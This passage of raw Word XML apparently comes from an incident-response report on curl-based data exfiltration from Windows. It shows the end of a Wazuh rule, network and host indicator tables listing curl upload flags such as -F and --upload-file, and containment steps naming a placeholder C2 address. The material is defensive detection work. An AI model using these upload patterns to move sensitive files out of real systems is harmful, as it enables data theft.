              </w:rPr>
              <w:t xml:space="preserve">    &lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="0CC9AE5F" w:rsidRDefault="0CC9AE5F" w14:paraId="1B59E123" w14:textId="691437B9">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="099E7C3F" w:rsidRDefault="099E7C3F" w14:paraId="0C800A6B" w14:textId="17058BFA">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00FD30F5" w:rsidR="00FD30F5" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="03E88B82" w14:textId="453CD8E2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00AC12F6" w:rsidR="006C07AB" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="7F77CCF0" w14:textId="469AF51B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Execution of curl.exe</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00AC12F6" w:rsidR="006C07AB" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="741F1590" w14:textId="4C8CE467">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Suspicious command line arguments used for uploading data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00D07CD4" w:rsidR="00B56223" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="7F0F12C5" w14:textId="3AEC8E4A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>HTTP or HTTPS used for outbound communication</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00924A31" w:rsidR="00B1604B" w:rsidP="2BFA4357" w:rsidRDefault="00B1604B" w14:paraId="271C4FBD" w14:textId="291C7477">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="00FA516C" w:rsidR="00B52402" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="37C6FF46" w14:textId="68615844">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network-Based Indicators Of Compromise (IOC):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="001548A6" w:rsidTr="001548A6" w14:paraId="6D62C2A7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="001548A6" w:rsidR="001548A6" w:rsidP="001548A6" w:rsidRDefault="001548A6" w14:paraId="5C6256BF" w14:textId="1B438800">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="001548A6" w:rsidR="001548A6" w:rsidP="001548A6" w:rsidRDefault="001548A6" w14:paraId="43A6B461" w14:textId="2A7E0723">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001548A6" w:rsidTr="001548A6" w14:paraId="678B22E6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001548A6" w:rsidP="001548A6" w:rsidRDefault="00FA516C" w14:paraId="00D28392" w14:textId="2441AD31">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>HTTP POST uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001548A6" w:rsidP="001548A6" w:rsidRDefault="00A8775D" w14:paraId="270E381B" w14:textId="66EA780A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Outbound POST request to upload data to unknown, suspicious IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w:rsidTr="001548A6" w14:paraId="562D99F6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="001548A6" w:rsidRDefault="00FA516C" w14:paraId="72C63D16" w14:textId="72176430">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>User Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="001548A6" w:rsidRDefault="00A8775D" w14:paraId="3A226FF3" w14:textId="6DAC51E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Curl in HTTP headers shows that the upload is done using curl command line  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w:rsidTr="001548A6" w14:paraId="67E3FE32" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="001548A6" w:rsidRDefault="00FA516C" w14:paraId="6B264E9A" w14:textId="55F0FD43">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="001548A6" w:rsidRDefault="00A8775D" w14:paraId="37A24954" w14:textId="01460457">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Connections to unknown external IPs and ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="001548A6" w:rsidR="001548A6" w:rsidP="2BFA4357" w:rsidRDefault="001548A6" w14:paraId="6EED4C25" w14:textId="4932FF2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001548A6" w:rsidP="2BFA4357" w:rsidRDefault="001548A6" w14:paraId="6707CC3B" w14:textId="3F0FBA9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6BB59A48" w:rsidP="099E7C3F" w:rsidRDefault="099E7C3F" w14:paraId="19CEDFD6" w14:textId="6874AB63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-based detection focuses on the activities done on the victim machine, Windows system. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Windows Event Logs and Sysmon logs show the curl.exe process creation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="66A2D987" w:rsidP="66A2D987" w:rsidRDefault="66A2D987" w14:paraId="7D84FDC7" w14:textId="0E8BA283">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63615EE9" wp14:editId="33AE4F89">
            <wp:extent cx="5829300" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5134699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69905" name="Picture 513469905"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The red boxed fields shown in the Sysmon logs above are the fields that are being checked in the Wazuh rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="001548A6" w:rsidR="00EF3FE1" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="2D82C375" w14:textId="6AE0A1F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host-Based Indicators of Compromise (IOC):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="001548A6" w:rsidTr="001548A6" w14:paraId="37F11C72" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="001548A6" w:rsidR="001548A6" w:rsidP="00B8236E" w:rsidRDefault="001548A6" w14:paraId="462EA3E9" w14:textId="7580A15E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="001548A6" w:rsidR="001548A6" w:rsidP="00B8236E" w:rsidRDefault="001548A6" w14:paraId="0652F797" w14:textId="0CBAF1E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001548A6" w:rsidTr="001548A6" w14:paraId="2216C3BF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001548A6" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="37DD0AEB" w14:textId="1D718323">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Process Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001548A6" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="35F8BA7B" w14:textId="5999FCD4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>curl.exe is executed on the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w:rsidTr="001548A6" w14:paraId="014855B7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="6B542698" w14:textId="231822C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Command line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="16597774" w14:textId="0C453171">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sensitive file names appear with parameters like -F, files=, filename=, --form, or --upload-file which suggests attempts to attach a file and upload data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w:rsidTr="001548A6" w14:paraId="3525AE30" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="161197F1" w14:textId="0AC5B919">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>File access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="3BFEB2FF" w14:textId="795BBC94">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sensitive confidential files accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA516C" w:rsidTr="001548A6" w14:paraId="301D6410" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="0DD96B60" w14:textId="6F8E1402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Parent processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA516C" w:rsidP="00B8236E" w:rsidRDefault="00FA516C" w14:paraId="68F8E95C" w14:textId="15E60DFC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Suspicious shells launched before curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001548A6" w:rsidP="2BFA4357" w:rsidRDefault="001548A6" w14:paraId="3AB13ED1" w14:textId="48F2298F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="61E9D32F" w14:textId="0F89C612">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896709" w:id="62"/>
      <w:commentRangeStart w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="63"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Strategies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="00AA46E5" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="5DC56057" w14:textId="1A7FA76B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In the incident response lifecycle, after detection and analysis is CER, containment, eradication, and recovery. Containment is when identifying and isolating the main assets involved in the incident. Eradication is when removing affected components. Recovery is when restoring affected systems back to normal. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA46E5" w:rsidP="2BFA4357" w:rsidRDefault="00AA46E5" w14:paraId="4D66017A" w14:textId="7CF06624">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00AA46E5" w:rsidR="00AA46E5" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="55EF21BE" w14:textId="5133F723">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Containment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA46E5" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="65AFABAC" w14:textId="11256347">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Isolate affected systems from the network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD77FA" w:rsidP="00E41785" w:rsidRDefault="001937C3" w14:paraId="4CBBAFAD" w14:textId="4AF003ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Block outbound traffic to &lt;ATTACKER_IP&gt;, the C2 IP address</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F0180" w:rsidTr="000F0180" w14:paraId="4E8464B3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
